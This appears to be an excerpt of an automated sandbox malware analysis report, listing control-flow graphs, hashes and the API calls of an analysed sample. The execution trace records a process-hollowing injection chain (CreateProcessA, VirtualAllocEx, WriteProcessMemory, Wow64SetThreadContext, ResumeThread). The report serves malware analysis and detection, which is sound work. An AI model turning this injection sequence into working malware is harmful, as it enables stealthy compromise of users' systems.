                                  control_flow_graph 0 fa2e73-fa2eb4 1 fa2ec0-fa2ec3 0->1 2 fa2eb6-fa2eb8 0->2 3 fa322e-fa325d 1->3 5 fa2ec9-fa2eec 1->5 2->3 4 fa2ebe 2->4 21 fa3264-fa3268 3->21 4->5 8 fa2ef8-fa2efb 5->8 9 fa2eee-fa2ef0 5->9 8->3 12 fa2f01-fa2f27 8->12 9->3 11 fa2ef6 9->11 11->12 15 fa2f29-fa2f2d 12->15 16 fa2f35-fa2f39 12->16 15->3 18 fa2f33 15->18 16->3 19 fa2f3f-fa2f4d 16->19 18->19 22 fa2f4f-fa2f5a 19->22 23 fa2f5c-fa2f64 19->23 24 fa326a-fa3274 21->24 25 fa3275-fa335e NtProtectVirtualMemory 21->25 26 fa2f67-fa2f69 22->26 23->26 49 fa3360-fa3366 25->49 50 fa3367-fa338c 25->50 27 fa2f6b-fa2f6d 26->27 28 fa2f75-fa2f78 26->28 27->3 30 fa2f73 27->30 28->3 31 fa2f7e-fa2fa1 28->31 30->31 35 fa2fad-fa2fb0 31->35 36 fa2fa3-fa2fa5 31->36 35->3 38 fa2fb6-fa2fda 35->38 36->3 37 fa2fab 36->37 37->38 41 fa2fdc-fa2fde 38->41 42 fa2fe6-fa2fe9 38->42 41->3 44 fa2fe4 41->44 42->3 45 fa2fef-fa3010 42->45 44->45 51 fa301c-fa301f 45->51 52 fa3012-fa3014 45->52 49->50 51->3 54 fa3025-fa3049 51->54 52->3 53 fa301a 52->53 53->54 59 fa304b-fa304d 54->59 60 fa3055-fa3058 54->60 59->3 62 fa3053 59->62 60->3 61 fa305e-fa3082 60->61 64 fa308e-fa3091 61->64 65 fa3084-fa3086 61->65 62->61 64->3 67 fa3097-fa30bb 64->67 65->3 66 fa308c 65->66 66->67 69 fa30bd-fa30bf 67->69 70 fa30c7-fa30ca 67->70 69->3 71 fa30c5 69->71 70->3 72 fa30d0-fa30e3 70->72 71->72 72->21 74 fa30e9-fa3118 72->74 75 fa311a-fa311c 74->75 76 fa3124-fa3127 74->76 75->3 77 fa3122 75->77 76->3 78 fa312d-fa3145 76->78 77->78 80 fa3151-fa3154 78->80 81 fa3147-fa3149 78->81 80->3 83 fa315a-fa3171 80->83 81->3 82 fa314f 81->82 82->83 86 fa321d-fa3226 83->86 87 fa3177-fa319a 83->87 86->74 88 fa322c 86->88 89 fa319c-fa319e 87->89 90 fa31a6-fa31a9 87->90 88->21 89->3 91 fa31a4 89->91 90->3 92 fa31af-fa31df 90->92 91->92 94 fa31e1-fa31e3 92->94 95 fa31e7-fa31ea 92->95 94->3 96 fa31e5 94->96 95->3 97 fa31ec-fa3209 95->97 96->97 99 fa320b-fa320d 97->99 100 fa3211-fa3214 97->100 99->3 101 fa320f 99->101 100->3 102 fa3216-fa321b 100->102 101->102 102->21
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00FA3351
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.1534796820.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_fa0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q$D@$D@
                                  • API String ID: 2706961497-3182924711
                                  • Opcode ID: 206e0603b1bb903e4910ed62ccf362b8bd02afceb6c5774bd7f6a0be8f12b817
                                  • Instruction ID: 0c455c31b79cab41e9057393c0108d77c414bc99ed34efb919b358117b65160c
                                  • Opcode Fuzzy Hash: 206e0603b1bb903e4910ed62ccf362b8bd02afceb6c5774bd7f6a0be8f12b817
                                  • Instruction Fuzzy Hash: D1E1B2B6F003044BEB14CABD9C903AE76E76FC5324F698229E915DB7C4EA74DE01A741
                                  Function 00FA32C8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 455 fa32c8-fa335e NtProtectVirtualMemory 458 fa3360-fa3366 455->458 459 fa3367-fa338c 455->459 458->459
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00FA3351
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.1534796820.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_fa0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 760625f1acf31f707f998059e8ba72c12d4c976b1ce675f674c1839521ad3c56
                                  • Instruction ID: 16ea3b82cad186eae1ae50d672f88738094ddf60dc9bb74cbc09a0fd4e7a64b0
                                  • Opcode Fuzzy Hash: 760625f1acf31f707f998059e8ba72c12d4c976b1ce675f674c1839521ad3c56
                                  • Instruction Fuzzy Hash: BD21C0B1D013499FDB14DFAAD980AEEFBF5FF48310F20842AE519A7250CB759901CBA5

                                  Execution Graph

                                  Execution Coverage:10.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:189
                                  Total number of Limit Nodes:9
                                  execution_graph 41514 b94668 41515 b9467a 41514->41515 41519 b946b8 41515->41519 41525 b94778 41515->41525 41516 b94686 41520 b946bc 41519->41520 41521 b946a0 41520->41521 41530 b94888 41520->41530 41534 b94878 41520->41534 41521->41516 41526 b9477c 41525->41526 41528 b94888 CreateActCtxA 41526->41528 41529 b94878 CreateActCtxA 41526->41529 41527 b947a7 41527->41516 41528->41527 41529->41527 41532 b948af 41530->41532 41531 b9498c 41531->41531 41532->41531 41538 b944b4 41532->41538 41536 b94880 41534->41536 41535 b9498c 41535->41535 41536->41535 41537 b944b4 CreateActCtxA 41536->41537 41537->41535 41539 b95918 CreateActCtxA 41538->41539 41541 b959db 41539->41541 41725 b9b218 41728 b9b300 41725->41728 41726 b9b227 41731 b9b304 41728->41731 41729 b9b2b5 41729->41726 41730 b9b548 GetModuleHandleW 41732 b9b575 41730->41732 41731->41729 41731->41730 41732->41726 41741 b9d7c8 DuplicateHandle 41742 b9d85e 41741->41742 41733 72c77c8 41734 72c77e0 41733->41734 41735 72c786d 41734->41735 41737 7608e07 41734->41737 41740 7608e0b 41737->41740 41738 7608df5 41738->41735 41739 7602730 PostMessageW 41739->41740 41740->41738 41740->41739 41743 76061d5 41744 7606104 41743->41744 41745 76061c5 41743->41745 41744->41745 41746 7607c20 13 API calls 41744->41746 41747 7607c24 13 API calls 41744->41747 41746->41745 41747->41745 41748 b9d580 41749 b9d5c6 GetCurrentProcess 41748->41749 41751 b9d618 GetCurrentThread 41749->41751 41752 b9d611 41749->41752 41753 b9d64e 41751->41753 41754 b9d655 GetCurrentProcess 41751->41754 41752->41751 41753->41754 41755 b9d68b 41754->41755 41756 b9d6b3 GetCurrentThreadId 41755->41756 41757 b9d6e4 41756->41757 41542 76060ff 41543 760608b 41542->41543 41544 7606102 41542->41544 41544->41543 41547 7607c20 41544->41547 41567 7607c24 41544->41567 41548 7607c3a 41547->41548 41587 76081a1 41548->41587 41591 760821d 41548->41591 41596 7608abd 41548->41596 41600 7608019 41548->41600 41605 76087b7 41548->41605 41610 7608277 41548->41610 41615 7608696 41548->41615 41621 760804f 41548->41621 41626 760866f 41548->41626 41631 760816d 41548->41631 41636 760830c 41548->41636 41641 760852c 41548->41641 41645 7608587 41548->41645 41650 7608526 41548->41650 41655 76084a3 41548->41655 41659 7608242 41548->41659 41664 7608081 41548->41664 41549 7607c42 41549->41543 41568 7607c3a 41567->41568 41570 76081a1 2 API calls 41568->41570 41571 7608081 2 API calls 41568->41571 41572 7608242 2 API calls 41568->41572 41573 76084a3 2 API calls 41568->41573 41574 7608526 2 API calls 41568->41574 41575 7608587 2 API calls 41568->41575 41576 760852c 2 API calls 41568->41576 41577 760830c 2 API calls 41568->41577 41578 760816d 2 API calls 41568->41578 41579 760866f 2 API calls 41568->41579 41580 760804f 2 API calls 41568->41580 41581 7608696 2 API calls 41568->41581 41582 7608277 2 API calls 41568->41582 41583 76087b7 2 API calls 41568->41583 41584 7608019 2 API calls 41568->41584 41585 7608abd PostMessageW 41568->41585 41586 760821d 2 API calls 41568->41586 41569 7607c42 41569->41543 41570->41569 41571->41569 41572->41569 41573->41569 41574->41569 41575->41569 41576->41569 41577->41569 41578->41569 41579->41569 41580->41569 41581->41569 41582->41569 41583->41569 41584->41569 41585->41569 41586->41569 41669 7605a60 41587->41669 41673 7605a59 41587->41673 41588 7608158 41592 760820b 41591->41592 41592->41591 41593 7608a39 41592->41593 41677 7605811 41592->41677 41681 7605818 41592->41681 41597 7608ac6 41596->41597 41598 7608af7 41597->41598 41685 7608d0a 41597->41685 41601 760802c 41600->41601 41602 7608049 41601->41602 41693 7605ce8 41601->41693 41697 7605cdc 41601->41697 41602->41549 41606 76087bb 41605->41606 41608 7605a60 WriteProcessMemory 41606->41608 41609 7605a59 WriteProcessMemory 41606->41609 41607 76087f3 41608->41607 41609->41607 41611 7608292 41610->41611 41701 76059a0 41611->41701 41705 7605998 41611->41705 41612 76082b0 41617 7608259 41615->41617 41616 76086d9 41616->41549 41617->41616 41709 7605b50 41617->41709 41713 7605b48 41617->41713 41618 760827f 41618->41549 41623 760802d 41621->41623 41622 7608049 41622->41549 41623->41622 41624 7605ce8 CreateProcessA 41623->41624 41625 7605cdc CreateProcessA 41623->41625 41624->41622 41625->41622 41627 760820b 41626->41627 41628 7608a39 41627->41628 41629 7605811 ResumeThread 41627->41629 41630 7605818 ResumeThread 41627->41630 41629->41627 41630->41627 41632 760817d 41631->41632 41634 7605a60 WriteProcessMemory 41632->41634 41635 7605a59 WriteProcessMemory 41632->41635 41633 76087f3 41634->41633 41635->41633 41637 76082cb 41636->41637 41638 760827f 41636->41638 41639 7605b50 ReadProcessMemory 41637->41639 41640 7605b48 ReadProcessMemory 41637->41640 41638->41549 41639->41638 41640->41638 41717 76058c0 41641->41717 41721 76058c8 41641->41721 41642 7608546 41642->41549 41647 760820b 41645->41647 41646 7608a39 41647->41646 41648 7605811 ResumeThread 41647->41648 41649 7605818 ResumeThread 41647->41649 41648->41647 41649->41647 41651 76086df 41650->41651 41653 76058c0 Wow64SetThreadContext 41651->41653 41654 76058c8 Wow64SetThreadContext 41651->41654 41652 76086fa 41653->41652 41654->41652 41657 7605a60 WriteProcessMemory 41655->41657 41658 7605a59 WriteProcessMemory 41655->41658 41656 76084d1 41656->41549 41657->41656 41658->41656 41660 7608248 41659->41660 41662 7605b50 ReadProcessMemory 41660->41662 41663 7605b48 ReadProcessMemory 41660->41663 41661 760827f 41661->41549 41662->41661 41663->41661 41665 7608049 41664->41665 41666 760802d 41664->41666 41665->41549 41666->41665 41667 7605ce8 CreateProcessA 41666->41667 41668 7605cdc CreateProcessA 41666->41668 41667->41665 41668->41665 41670 7605aa8 WriteProcessMemory 41669->41670 41672 7605aff 41670->41672 41672->41588 41674 7605a60 WriteProcessMemory 41673->41674 41676 7605aff 41674->41676 41676->41588 41678 7605818 ResumeThread 41677->41678 41680 7605889 41678->41680 41680->41592 41682 7605858 ResumeThread 41681->41682 41684 7605889 41682->41684 41684->41592 41686 7608d12 41685->41686 41688 7608d82 41685->41688 41686->41598 41687 7608d8b 41687->41598 41688->41687 41690 7602730 41688->41690 41691 76090c0 PostMessageW 41690->41691 41692 760912c 41691->41692 41692->41688 41694 7605d71 CreateProcessA 41693->41694 41696 7605f33 41694->41696 41696->41696 41698 7605ce8 CreateProcessA 41697->41698 41700 7605f33 41698->41700 41700->41700 41702 76059e0 VirtualAllocEx 41701->41702 41704 7605a1d 41702->41704 41704->41612 41706 76059a0 VirtualAllocEx 41705->41706 41708 7605a1d 41706->41708 41708->41612 41710 7605b9b ReadProcessMemory 41709->41710 41712 7605bdf 41710->41712 41712->41618 41714 7605b51 ReadProcessMemory 41713->41714 41716 7605bdf 41714->41716 41716->41618 41718 76058c5 Wow64SetThreadContext 41717->41718 41720 7605955 41718->41720 41720->41642 41722 760590d Wow64SetThreadContext 41721->41722 41724 7605955 41722->41724 41724->41642

                                  Executed Functions

                                  Function 00B9D570 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1561 b9d570-b9d572 1562 b9d574 1561->1562 1563 b9d576-b9d60f GetCurrentProcess 1561->1563 1562->1563 1568 b9d618-b9d64c GetCurrentThread 1563->1568 1569 b9d611-b9d617 1563->1569 1570 b9d64e-b9d654 1568->1570 1571 b9d655-b9d689 GetCurrentProcess 1568->1571 1569->1568 1570->1571 1572 b9d68b-b9d691 1571->1572 1573 b9d692-b9d6ad call b9d75b 1571->1573 1572->1573 1577 b9d6b3-b9d6e2 GetCurrentThreadId 1573->1577 1578 b9d6eb-b9d74d 1577->1578 1579 b9d6e4-b9d6ea 1577->1579 1579->1578
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00B9D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D6D1
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 85602eedfe83051da875eb7512a19f82dd86f129e5df03ab444638a1776623f3
                                  • Instruction ID: 23e5688d27401e272c68b08bc33205eb31d26daa64383540aa002863c88b9c80
                                  • Opcode Fuzzy Hash: 85602eedfe83051da875eb7512a19f82dd86f129e5df03ab444638a1776623f3
                                  • Instruction Fuzzy Hash: 7D5159B1D00349CFEB14CFAAD5487AEBBF1EF48304F2484A9E019A73A1D7749944CB66
                                  Function 00B9D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1586 b9d580-b9d60f GetCurrentProcess 1590 b9d618-b9d64c GetCurrentThread 1586->1590 1591 b9d611-b9d617 1586->1591 1592 b9d64e-b9d654 1590->1592 1593 b9d655-b9d689 GetCurrentProcess 1590->1593 1591->1590 1592->1593 1594 b9d68b-b9d691 1593->1594 1595 b9d692-b9d6ad call b9d75b 1593->1595 1594->1595 1599 b9d6b3-b9d6e2 GetCurrentThreadId 1595->1599 1600 b9d6eb-b9d74d 1599->1600 1601 b9d6e4-b9d6ea 1599->1601 1601->1600
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00B9D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D6D1
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ebe7de640054f1a471107290b9e0b5ef33e6a72fae9da0ec07f5afb1d7e929a7
                                  • Instruction ID: 993a920581e08fc111873d35d2a2c2d9a5888d2d64f1f50bfc57244ce98c4715
                                  • Opcode Fuzzy Hash: ebe7de640054f1a471107290b9e0b5ef33e6a72fae9da0ec07f5afb1d7e929a7
                                  • Instruction Fuzzy Hash: 005138B1D00749CFEB14CFAAD548BAEBBF1EF48304F208469E019A7391D7749944CB66
                                  Function 072C9250 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1659 72c9250-72c9276 1660 72c9333-72c9342 1659->1660 1662 72c934d-72c93ae 1660->1662 1677 72c932a 1662->1677 1679 72c9287-72c9331 1677->1679 1680 72c9280 1677->1680 1679->1677 1680->1660 1680->1679 1681 72c9315-72c9329 1680->1681 1682 72c92b7-72c92d5 1680->1682 1687 72c92dc-72c92e9 1682->1687 1688 72c92d7-72c92da 1682->1688 1689 72c92eb-72c92fa 1687->1689 1688->1689 1692 72c92fc-72c9302 1689->1692 1693 72c9312 1689->1693 1694 72c9304 1692->1694 1695 72c9306-72c9308 1692->1695 1693->1681 1694->1693 1695->1693
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723
                                  • Opcode ID: f447eb3889c187bffe635e439579c348c0069261379bddb5e842694710be3d5a
                                  • Instruction ID: 437a9965ad9ad071b86c8f67d6c03595a37e9e443dd0e537a34393b1967883d5
                                  • Opcode Fuzzy Hash: f447eb3889c187bffe635e439579c348c0069261379bddb5e842694710be3d5a
                                  • Instruction Fuzzy Hash: 0C31C5B4E34206CBDB00DA94C44567D76B1EB96300F50426ED5C7AB3C0DBB1688287A7
                                  Function 072C839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1718 72c839f-72c83d7 1720 72c83e0-72c83e2 1718->1720 1721 72c83fa-72c8417 1720->1721 1722 72c83e4-72c83ea 1720->1722 1726 72c841d-72c8513 1721->1726 1727 72c8582-72c8587 1721->1727 1723 72c83ec 1722->1723 1724 72c83ee-72c83f0 1722->1724 1723->1721 1724->1721
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826
                                  • Opcode ID: d2c0971ac6a972c3cdaf4a2e53fb2e456d8038e97e5d036d9265d31e36d8c9cb
                                  • Instruction ID: 0b6cc85ebc14154f4db5b75599a841795ea1e81504f0574065a2172cd356bc0e
                                  • Opcode Fuzzy Hash: d2c0971ac6a972c3cdaf4a2e53fb2e456d8038e97e5d036d9265d31e36d8c9cb
                                  • Instruction Fuzzy Hash: 7B01FEB0760346CFE724C628CD267A93371BB20710F19C9A9DD06AF6C1DAF55C90C791
                                  Function 072C2AC7 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1730 72c2ac7-72c2ad0 1731 72c2aa5-72c2aaa 1730->1731 1732 72c2ad2-72c2ae7 1730->1732 1733 72c2aef-72c2af1 1732->1733 1734 72c2b0b-72c2b78 call 72c20d8 1733->1734 1735 72c2af3-72c2b08 1733->1735 1744 72c2b7e-72c2b80 1734->1744 1745 72c2c24-72c2c3b 1734->1745 1746 72c2b86-72c2b91 call 72c22f0 1744->1746 1747 72c2cb0-72c2d57 1744->1747 1755 72c2c3d-72c2c3f 1745->1755 1756 72c2c41 1745->1756 1753 72c2bae-72c2bb2 1746->1753 1754 72c2b93-72c2b95 1746->1754 1786 72c2d59-72c2d5f 1747->1786 1787 72c2d60-72c2d81 1747->1787 1759 72c2bb4-72c2bc8 call 72c2418 1753->1759 1760 72c2c11-72c2c1a 1753->1760 1757 72c2b97-72c2b9e 1754->1757 1758 72c2ba0-72c2bab call 72c16cc 1754->1758 1762 72c2c46-72c2c48 1755->1762 1756->1762 1757->1753 1758->1753 1770 72c2bde-72c2be2 1759->1770 1771 72c2bca-72c2bdb call 72c16cc 1759->1771 1765 72c2c7d-72c2ca9 1762->1765 1766 72c2c4a-72c2c76 1762->1766 1765->1747 1766->1765 1775 72c2bea-72c2c03 1770->1775 1776 72c2be4 1770->1776 1771->1770 1782 72c2c0e 1775->1782 1783 72c2c05 1775->1783 1776->1775 1782->1760 1783->1782 1786->1787
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777
                                  • Opcode ID: ba8e12b14d618256ce361025e457cdefdcdc8534047b0b4be276bbe3ca36a615
                                  • Instruction ID: 8bb7a3a3fcab61704cbf86085d60f2c2240f70130abd8334fe632ec63b196794
                                  • Opcode Fuzzy Hash: ba8e12b14d618256ce361025e457cdefdcdc8534047b0b4be276bbe3ca36a615
                                  • Instruction Fuzzy Hash: A181C0B1A10215CFEB14DF69E8047AEBBF6FBD9210F14852EE405A7241DF389D05CBA5
                                  Function 072C82D0 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1793 72c82d0-72c82dc 1794 72c82de-72c8335 call 72c839f 1793->1794 1795 72c8333 1793->1795 1797 72c833b-72c833d 1794->1797 1795->1794 1801 72c82fc-72c830b 1797->1801 1802 72c82e6-72c82ec 1797->1802 1803 72c830d-72c831a 1801->1803 1804 72c833f-72c851f 1801->1804 1805 72c82ee 1802->1805 1806 72c82f0-72c82f2 1802->1806 1803->1804 1807 72c831c-72c8332 1803->1807 1805->1801 1806->1801
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  • Opcode ID: f4d9ee32ce749d097e62c65841232ccc2dea0176f569b4330462d8e93461c51f
                                  • Instruction ID: 6d9ede3fd239697066e5951daddca550e131f5bd01da73d991e20378a0b78920
                                  • Opcode Fuzzy Hash: f4d9ee32ce749d097e62c65841232ccc2dea0176f569b4330462d8e93461c51f
                                  • Instruction Fuzzy Hash: 161190B0A39296CFC311DB24C909265BBB4BB16241F05C3EFD409DB142D7B48942C7AA
                                  Function 07605CDC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1951 7605cdc-7605d7d 1954 7605db6-7605dd6 1951->1954 1955 7605d7f-7605d89 1951->1955 1960 7605dd8-7605de2 1954->1960 1961 7605e0f-7605e3e 1954->1961 1955->1954 1956 7605d8b-7605d8d 1955->1956 1958 7605db0-7605db3 1956->1958 1959 7605d8f-7605d99 1956->1959 1958->1954 1962 7605d9b 1959->1962 1963 7605d9d-7605dac 1959->1963 1960->1961 1964 7605de4-7605de6 1960->1964 1971 7605e40-7605e4a 1961->1971 1972 7605e77-7605f31 CreateProcessA 1961->1972 1962->1963 1963->1963 1965 7605dae 1963->1965 1966 7605de8-7605df2 1964->1966 1967 7605e09-7605e0c 1964->1967 1965->1958 1969 7605df4 1966->1969 1970 7605df6-7605e05 1966->1970 1967->1961 1969->1970 1970->1970 1973 7605e07 1970->1973 1971->1972 1974 7605e4c-7605e4e 1971->1974 1983 7605f33-7605f39 1972->1983 1984 7605f3a-7605fc0 1972->1984 1973->1967 1976 7605e50-7605e5a 1974->1976 1977 7605e71-7605e74 1974->1977 1978 7605e5c 1976->1978 1979 7605e5e-7605e6d 1976->1979 1977->1972 1978->1979 1979->1979 1980 7605e6f 1979->1980 1980->1977 1983->1984 1994 7605fd0-7605fd4 1984->1994 1995 7605fc2-7605fc6 1984->1995 1996 7605fe4-7605fe8 1994->1996 1997 7605fd6-7605fda 1994->1997 1995->1994 1998 7605fc8 1995->1998 2000 7605ff8-7605ffc 1996->2000 2001 7605fea-7605fee 1996->2001 1997->1996 1999 7605fdc 1997->1999 1998->1994 1999->1996 2003 760600e-7606015 2000->2003 2004 7605ffe-7606004 2000->2004 2001->2000 2002 7605ff0 2001->2002 2002->2000 2005 7606017-7606026 2003->2005 2006 760602c 2003->2006 2004->2003 2005->2006 2007 760602d 2006->2007 2007->2007
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07605F1E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 23ee38d065a4e927db27f03375ba76cfb7e9dff51940cc6d5ee1090cdddc60d9
                                  • Instruction ID: 265247a7812a02fb540299957a3ec90c65d12a3c9c924e8279acd6956888f1c9
                                  • Opcode Fuzzy Hash: 23ee38d065a4e927db27f03375ba76cfb7e9dff51940cc6d5ee1090cdddc60d9
                                  • Instruction Fuzzy Hash: 1FA14FB1D00219CFEF24DF68C845BEEBBB2BF44314F148169E85AA7281DB749991CF91
                                  Function 07605CE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2009 7605ce8-7605d7d 2011 7605db6-7605dd6 2009->2011 2012 7605d7f-7605d89 2009->2012 2017 7605dd8-7605de2 2011->2017 2018 7605e0f-7605e3e 2011->2018 2012->2011 2013 7605d8b-7605d8d 2012->2013 2015 7605db0-7605db3 2013->2015 2016 7605d8f-7605d99 2013->2016 2015->2011 2019 7605d9b 2016->2019 2020 7605d9d-7605dac 2016->2020 2017->2018 2021 7605de4-7605de6 2017->2021 2028 7605e40-7605e4a 2018->2028 2029 7605e77-7605f31 CreateProcessA 2018->2029 2019->2020 2020->2020 2022 7605dae 2020->2022 2023 7605de8-7605df2 2021->2023 2024 7605e09-7605e0c 2021->2024 2022->2015 2026 7605df4 2023->2026 2027 7605df6-7605e05 2023->2027 2024->2018 2026->2027 2027->2027 2030 7605e07 2027->2030 2028->2029 2031 7605e4c-7605e4e 2028->2031 2040 7605f33-7605f39 2029->2040 2041 7605f3a-7605fc0 2029->2041 2030->2024 2033 7605e50-7605e5a 2031->2033 2034 7605e71-7605e74 2031->2034 2035 7605e5c 2033->2035 2036 7605e5e-7605e6d 2033->2036 2034->2029 2035->2036 2036->2036 2037 7605e6f 2036->2037 2037->2034 2040->2041 2051 7605fd0-7605fd4 2041->2051 2052 7605fc2-7605fc6 2041->2052 2053 7605fe4-7605fe8 2051->2053 2054 7605fd6-7605fda 2051->2054 2052->2051 2055 7605fc8 2052->2055 2057 7605ff8-7605ffc 2053->2057 2058 7605fea-7605fee 2053->2058 2054->2053 2056 7605fdc 2054->2056 2055->2051 2056->2053 2060 760600e-7606015 2057->2060 2061 7605ffe-7606004 2057->2061 2058->2057 2059 7605ff0 2058->2059 2059->2057 2062 7606017-7606026 2060->2062 2063 760602c 2060->2063 2061->2060 2062->2063 2064 760602d 2063->2064 2064->2064
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07605F1E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: b5b76d3e6d538e5503f0c2baba6d00cc1ff8b52825630631db2eaee4d3240948
                                  • Instruction ID: ba73bb8f395b1a7f57b10dd5e564e8359ff69255dbc23f64eb3a7ba8ec9fceb6
                                  • Opcode Fuzzy Hash: b5b76d3e6d538e5503f0c2baba6d00cc1ff8b52825630631db2eaee4d3240948
                                  • Instruction Fuzzy Hash: 68914DB1D00219CFEF24DF68C845BEEBBB2BF44314F148169E85AA7281DB749991CF91
                                  Function 00B9B300 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
